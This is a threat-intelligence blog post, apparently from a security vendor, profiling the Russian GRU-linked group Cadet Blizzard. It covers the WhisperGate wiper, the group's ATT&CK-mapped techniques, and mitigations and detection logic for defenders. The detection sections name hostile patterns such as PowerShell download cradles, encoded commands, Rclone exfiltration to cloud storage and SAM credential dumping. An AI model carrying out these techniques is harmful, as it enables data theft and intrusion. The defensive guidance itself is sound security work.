Cadet Blizzard Exposed: Critical Tactics Used by Russian Hackers

Cadet Blizzard has emerged as a novel actor affiliated with Russia’s Main Directorate of the General Staff of the Armed Forces (GRU). First observed in 2020, Cadet Blizzard prioritises targeting government services, law enforcement, non-profit/non-governmental organisations, IT service providers/consulting, and emergency services in Ukraine

Unlike established GRU-affiliated groups such as APT28 (Fancy Bear, Sofacy, Strontium, Sednit, SIG40, Group 74, PawnStorm, Snakemackerel, TG-4127, Tsar Team, Blue Athena, IRON TWILIGHT, Swallowtail, Threat Group-4127, Forest Blizzard) and Sandworm (Electrum, Telebots, BlackEnergy, Quedagh, Voodoo Bear, CTG-7263, Hades, OlympicDestroyer, IRIDIUM, TEMP.Noble, IRON VIKING, Seashell Blizzard), Cadet Blizzard operates independently, focusing on destructive cyber operations to support military objectives in Ukraine. Their actions aim to deliver impact, even at the expense of network operations and the exposure of sensitive information through targeted hack-and-leak operations.

Cadet Blizzard’s operations are centred around Ukraine but have expanded to target European and Latin American entities, seeking tactical and strategic-level insights into Western operations and policies related to the conflict. Cadet Blizzard operates throughout the week, specifically targeting off-business hours of their primary targets to reduce the likelihood of detection.

Microsoft has linked Cadet Blizzard to the WhisperGate data-wiping attacks on Ukrainian government organisations preceding the Russian invasion in February 2022. These cyber offensives coincided with the deployment of Russian tanks and troops along the Ukrainian borders.

WhisperGate disguised itself as ransomware but instead wiped infected devices, resembling the notorious NotPetya wiper that targeted Ukrainian businesses in 2017. The group was also involved in defacing Ukrainian websites and conducting hack-and-leak operations promoted through the ‘Free Civilian’ Telegram channel.

Since February 2023, the GRU hacking group behind Cadet Blizzard has intensified attacks on Ukrainian government organisations and IT providers. Microsoft has connected these incidents to breaches reported by Ukraine’s Computer Emergency Response Team (CERT-UA), uncovering evidence of persistent threats posed by Russian state hackers.

Cadet Blizzard employs a range of tools, tactics, and procedures to achieve their objectives. They frequently initiates intrusions by targeting vulnerable infrastructure via Exploit Public-Facing Application (T1190). Rather than relying solely on phishing, the group actively scans for and exploits vulnerabilities in internet-exposed services to establish an initial foothold. To maintain presence and prepare for further lateral movement, they have been observed deploying Malware (T1588.001, T1587.001) and legitimate utilities disguised for malicious use (T1588.002).

Once inside the network, a primary objective is privilege escalation and credential harvesting. The group specifically targets the Security Account Manager (T1003.002). By accessing the SAM database, typically found on local Windows systems, they attempt to dump password hashes to compromise local administrator accounts. This activity often precedes lateral movement and is a critical choke point for detection.

The group’s intelligence-gathering capabilities are focused on two main areas. First, they execute Data from Local System (T1005), searching compromised endpoints for sensitive files and directories. Second, they employ Email Collection (T1114), targeting mail repositories to extract sensitive communications. This is often facilitated by tools such as Rclone, a command-line program used to manage files on cloud storage, which the group leverages for data exfiltration.

Consistent with their mandate to disrupt and intimidate, Cadet Blizzard continues to utilise External Defacement (T1491.002). This technique involves modifying public-facing websites or messaging systems to broadcast propaganda or signal a breach, often serving as a distraction from concurrent destructive activities involving the WhisperGate wiper.

Microsoft notes that Cadet Blizzard’s attacks have a relatively lower success rate compared to other GRU-affiliated groups such as APT28 and Sandworm. While Cadet Blizzard experienced a decline in activity after June 2022, the group resurfaced in early 2023 and has achieved occasional success in their recent cyber operations. However, they have not matched the impact of their GRU counterparts’ attacks.

Cadet Blizzard’s activities, although not as successful or mature as other GRU-affiliated threat actors, demand attention due to their focus on delivering impact and their potential to gain strategic-level insights into Western operations and policies related to the conflict.

To effectively counter Cadet Blizzard, organisations must move beyond generic security hygiene and implement controls that directly disrupt the group’s specific Tactics, Techniques, and Procedures (TTPs). This is known as Threat-Informed Defence (TID).

Given Cadet Blizzard’s reliance on Email Collection (T1114), organisations should prioritise the auditing of email environments. Specifically, security teams should implement Audit (M1047) mechanisms to regularly review auto-forwarding rules. In Exchange environments, administrators can utilise the Get-InboxRule cmdlet to discover and remove potentially malicious forwarding rules that the group may use to siphon data.

Furthermore, to reduce the impact if mail is exported/intercepted/forwarded, organisations should Encrypt Sensitive Information (M1041). Implementing public key cryptography ensures that even if an adversary accesses email stores, they cannot read the content without the private certificate and encryption key. This should be paired with Multi-factor Authentication (M1032) on all public-facing webmail servers to minimise the value of compromised usernames and passwords.

Cadet Blizzard frequently gains entry via Exploit Public-Facing Application (T1190). To mitigate this, Application Isolation and Sandboxing (M1048) is critical; this limits what system features and processes an exploited application can access, containing the breach. Additionally, deploying Web Application Firewalls (WAFs) under Exploit Protection (M1050) can limit exposure by preventing exploit traffic from ever reaching the application.

Network defenders should also Filter Network Traffic (M1037) by restricting outbound connections from public-facing servers. While this may not prevent the initial exploit, it severely hampers the attacker’s ability to establish command and control (C2) or verify their success post-compromise.

To limit the downstream value of credential access stemming from Security Account Manager (T1003.002) activity, organisations should harden authentication and account design through Operating System Configuration (M1028) and Privileged Account Management (M1026). Specifically, security teams should consider disabling or restricting NTLM authentication wherever feasible.

While this does not inherently stop an attacker from attempting to access the SAM database, it reduces the usefulness of harvested NTLM-based credentials and disrupts common follow-on abuse such as credential replay and lateral movement. This should be paired with strict privileged account controls, enforce least privilege for service accounts, minimise local administrator membership, and implement strong local administrator password hygiene (for example, centrally managed unique local admin passwords) so that even if credentials are exposed, the attacker’s inherited permissions and ability to move are constrained.

To reduce the impact of compromised email accounts being used to trigger high-risk actions, organisations should implement an Out-of-Band Communications Channel (M1060). Security teams should require secure out-of-band verification for critical requests initiated via email, such as password resets, financial transactions, or access approvals, so that an attacker who has gained mailbox access cannot successfully authenticate the request through email alone.

For highly sensitive matters, staff should shift the conversation to a separate trusted channel (for example, a known-good phone callback procedure, a secure internal ticketing portal, or an approved secure messaging platform) rather than relying solely on email.

Finally, Data Loss Prevention (M1057) tools should be tuned to detect and restrict access to sensitive unencrypted data residing on local systems, directly countering the group’s Data from Local System (T1005) collection techniques.

Tool-Specific Coverage

Cadet Blizzard has also been observed using specific tooling and malware, including Rclone (S1040) and WhisperGate (S0689), and defenders should ensure their security stack explicitly recognises and monitors for these artifacts. Security teams should validate that AV/EDR signatures and detection content cover these families/tools, update SIEM detection rules to look for them in the environment, and monitor network telemetry for signs of their use.

Rclone

Because Rclone is a legitimate command-line utility for syncing data to cloud storage services, its presence in production environments can enable fast, low-friction data movement and exfiltration.
Defenders should treat Rclone as high-risk dual-use tooling and restrict or tightly govern its execution on servers and user endpoints that do not have an explicit business requirement for it. In parallel, defenders should apply Filter Network Traffic (M1037) controls to constrain outbound access to unsanctioned cloud storage destinations, reducing the attacker’s ability to transfer collected data off-network even if the tool is executed.

WhisperGate

A multi-stage wiper, WhisperGate is designed to appear like ransomware. Since destructive malware is an impact event rather than simple collection, organisations should ensure they can rapidly contain suspected WhisperGate execution and recover safely. This includes ensuring endpoint security tooling can detect and block WhisperGate, and validating that backups and recovery procedures are resilient to destructive activity (e.g., offline/immutable backups and tested restoration workflows).

To effectively identify Cadet Blizzard’s activity, Security Operations Centers (SOCs) must move beyond general alerts and tune their SIEM, EDR, and XDR platforms to detect specific, high-fidelity artifacts. The following detection logic is mapped directly to the group’s observed operational behaviours.

Endpoint and File Integrity Monitoring (FIM)

Defenders should implement strict monitoring for abnormal file access, a primary indicator of Data from Local System (T1005).

• Configure FIM to alert on unexpected access to sensitive user files, specifically filtering for extensions such as .pdf, .docx, and .jpg, as well as local database files. Scope the detection to servers that shouldn’t browse user content (Exchange, app servers, jump hosts), or a defined crown jewels file share. Consider burst logic, such as N file reads across many directories in X minutes. Only alert when the accessor is non-standard (unsigned, temp path, new binary) or a service account that doesn’t normally do this.
• For environments running ESXi, detection rules must be explicitly tuned to monitor the /vmfs/volumes directory. Alert on unauthorised access to .vmdk and .vmsn files, as the theft of these virtual disk and snapshot files is a documented technique for this actor. To reduce noise, allowlist known management sources (vCenter IPs, backup servers) and known processes/accounts. Alert on direct host access patterns that bypass expected management paths (e.g., interactive sessions, SSH/SCP access, unfamiliar admin accounts). Focus on unusual time, along with unusual principal and unusual source as a triple condition.
• Monitor for unusual processes accessing local system email files, which indicates active Email Collection (T1114) attempts. Allowlist expected processes (Outlook, Exchange services, indexer, backup). Alert when access is performed by non-mail processes (web worker, script host, unknown binary) and correlates with other signals (archive creation, outbound upload).

Process and API Telemetry

Cadet Blizzard’s reconnaissance often generates distinct process patterns that can be caught before exfiltration occurs.

• Tune EDR sensors to flag specific OS API Execution calls that search local file systems or enumerate directories. This behavior often precedes the staging of data. To reduce noise, only trigger when the process is new/rare on that host, from temp/user-writable paths, unsigned, or spawned by a high-risk parent (web server worker, office app, script host). Add volume and breadth thresholds, such as many directories, many file types, many shares.
• Alert on newly executed processes that exhibit search and find behaviors against local databases or file shares. If a process that typically does not access these resources suddenly begins traversing the file system, it should be investigated. To tighten the scope, look to servers where file browsing is atypical (DMZ apps, Exchange, MFT appliances). You can also add parent process constraints (e.g., w3wp.exe, then cmd.exe/powershell.exe, then findstr/robocopy/7z/rclone), and add time correlation with staging/exfiltration indicators (for example, an archive being created shortly before an outbound spike).
• Heightened scrutiny should be applied to Script Execution, often used to automate the collection and compression of data. Specify which script engines and which suspicious patterns should be alerted on such as PowerShell with -enc, -nop, IEX, download cradle patterns, or script writing archives, enumerating mailboxes/shares, launching rclone, curl, or bitsadmin. Scope the detection to unexpected hosts (DMZ servers, Exchange, MFT) and unexpected accounts (such service accounts, or newly privileged accounts).

Network Traffic Analysis

Network artifacts provide the strongest signal for Email Collection (T1114) and C2 activity.

• Configure network monitoring to flag newly constructed connections sending or receiving data from untrusted hosts. This is particularly relevant for identifying exfiltration channels. Define what is untrusted for your organisation, such as not in allowlist, new ASN/geography, low reputation, or newly registered domain. Add byte thresholds (high outbound bytes, sustained sessions, repeated retries), and scope to public-facing servers that should have tight egress, or to specific protocols that matter (such as rare outbound from Exchange/MFT).
• Investigate processes connecting to email servers that do not ostensibly have a business need to do so. Any deviation from standard traffic patterns, such as a non-mail client process connecting to an SMTP or IMAP port, should be treated as suspicious. To scope the detection, separate internal vs external SMTP/IMAP. Non-mail processes talking to external mail services is far higher signal. Use an allowlist of legitimate mail-capable processes and alert on everything else. Add context such as authorisation (failed logons, unusual auth mechanism) and time correlation (such as recent rule creation, mailbox export, or outbound spike).

Identity and Access Monitoring

Credential abuse is a core facilitator of Cadet Blizzard’s lateral movement.

• Monitor Logon Session Creation for unusual activity patterns. Specifically, look for logins from unknown or abnormal geographic locations involving high-value accounts, such as Exchange Administrators. An anomalous login here often signals the start of an email collection campaign, but VPNs, travel, mobile devices, and cloud auth patterns create lots of unexpected geography false positives. Refine the detection by using identity risk signals (such as a new device, unfamiliar IP, or an atypical user agent). Baseline on known VPN egress ranges and expected admin jump hosts and correlate with high-impact actions (such as mailbox rule creation, privilege changes, new OAuth app consent, or export activity).

Web and Application Defence

To counter External Defacement (T1491.002), detection must extend to public-facing assets.

• Deploy monitors for unplanned content changes on external websites. This includes tracking File Creation or File Modification events that overwrite index.html or other core web files. Integrate this detection with deployment/change windows and suppress alerts during planned releases). Alert only when changes are made outside the CI/CD process or by unexpected accounts. Focus on web-root writes and suspicious parent process (such as web worker spawning s shell, or edits from an unknown IP).

Rclone

• Alert on the execution of rclone.exe (Windows) or rclone (Linux/macOS), especially on servers where it is not standard.
• Flag suspicious command patterns such as bulk sync/copy operations, use of newly created “remote” destinations, or references to external cloud storage targets (e.g., MEGA/Drive/S3-style remotes).
• Trigger on unusual outbound upload volume from systems running Rclone, or on new outbound connections to cloud storage services that are not part of approved business workflows.

WhisperGate

• Treat any WhisperGate-related alert from EDR/AV as a high-severity incident requiring immediate containment and scoping, given its wiper functionality.
• Alert on abnormal spikes in file modification/destructive write patterns across endpoints and servers that may indicate wiping behaviour (impact-focused monitoring aligned with data destruction).
• If your environment supports it, correlate destructive activity signals with unusual lateral execution or administrative tooling patterns to identify whether the wiper is being deployed broadly rather than acting as an isolated infection.

Don’t just read about Cadet Blizzard, operationalise this intelligence today.

Arachne Digital helps organisations move from reactive patching to proactive Threat-Informed Defence:

• Get the full structured dataset behind this report, including complete IoCs and TTP mappings, via our API.
• Use Thread, our open-source tool, to map your own internal reports to MITRE ATT&CK and identify your specific coverage gaps.
• Reach out to the Threat-Informed Defence Alliance to design a bespoke defence program that prioritises the threats targeting your specific industry and region.

Start building a smarter defence today. Contact Arachne Digital to get started.

The evolution of Cadet Blizzard marks a critical shift in the Russian cyber threat landscape. Merely staying alert is no longer sufficient. To truly counter Cadet Blizzard, organisations must adopt a threat-informed defence strategy that maps directly to Cadet Blizzard’s specific behaviours. This means moving past generic hygiene and implementing targeted controls, such as auditing email forwarding rules to stop Cadet Blizzard’s collection efforts, restricting NTLM to limit their credential theft, and aggressively monitoring for the specific file and network artifacts Cadet Blizzard leaves behind.

By understanding how Cadet Blizzard operates, down to the specific API calls and file extensions they target, defenders can turn the tables. Implementing these precise, intelligence-driven mitigations is the only way to effectively neutralise the risk posed by Cadet Blizzard and safeguard regional security against this evolving adversary.